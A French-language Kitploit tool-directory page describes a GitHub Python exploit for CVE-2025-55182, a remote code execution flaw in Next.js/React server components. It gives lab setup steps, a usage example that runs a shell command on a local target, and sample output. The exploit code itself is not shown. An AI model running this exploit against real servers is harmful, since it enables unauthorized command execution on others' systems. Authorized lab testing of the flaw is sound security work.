Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2025-55182 — Exploit Python pour CVE-2025-55182, une injection JavaScript côté serveur dans Next.js/React permettant l'exécution de code à distance via des données multipart malformées. Inclut une configuration de laboratoire pour les tests autorisés. | Kitploit
Outils/GitHubGitHub/liamromanis101/cve-2025-55182
Analyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationOutil d'Accès à DistanceLabs et Pratique
GitHubliamromanis101/cve-2025-55182

cve-2025-55182

Exploit Python pour CVE-2025-55182, une injection JavaScript côté serveur dans Next.js/React permettant l'exécution de code à distance via des données multipart malformées. Inclut une configuration de laboratoire pour les tests autorisés.

Voir le dépôt
10il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182 Exploit Python

Script Python 3 pouvant être utilisé pour démontrer CVE-2025-55182. Il exploite une vulnérabilité d'injection JavaScript côté serveur dans les applications Next.js/React, permettant l'exécution de code à distance via des données de formulaire multipart malformées.

⚠️ À des fins éducatives et de tests autorisés uniquement.


Configuration du laboratoire

De https://securitylabs.datadoghq.com/articles/cve-2025-55182-react2shell-remote-code-execution-react-server-components/

root@kitploit:~
npx [email protected] sample-app --yes
cd sample app
npm run build
npm run start

🚀 Utilisation

🔧 Prérequis

root@kitploit:~
pip install requests

Exemple d'utilisation

root@kitploit:~
python3 exploit_cve_2025_55182.py -u http://localhost:3000 -c "id"

Options

-u Domaine ou IP cible avec protocole - http://localhost:3000 -c Commande à exécuter sur le serveur - id

Exemple de sortie

root@kitploit:~
[+] Envoi de l'exploit vers http://localhost:3000 avec la commande : id
[+] Résultat de la commande :
uid=1000(app) gid=1000(app) groups=1000(app)

Référence

https://securitylabs.datadoghq.com/articles/cve-2025-55182-react2shell-remote-code-execution-react-server-components/

Télécharger l’outil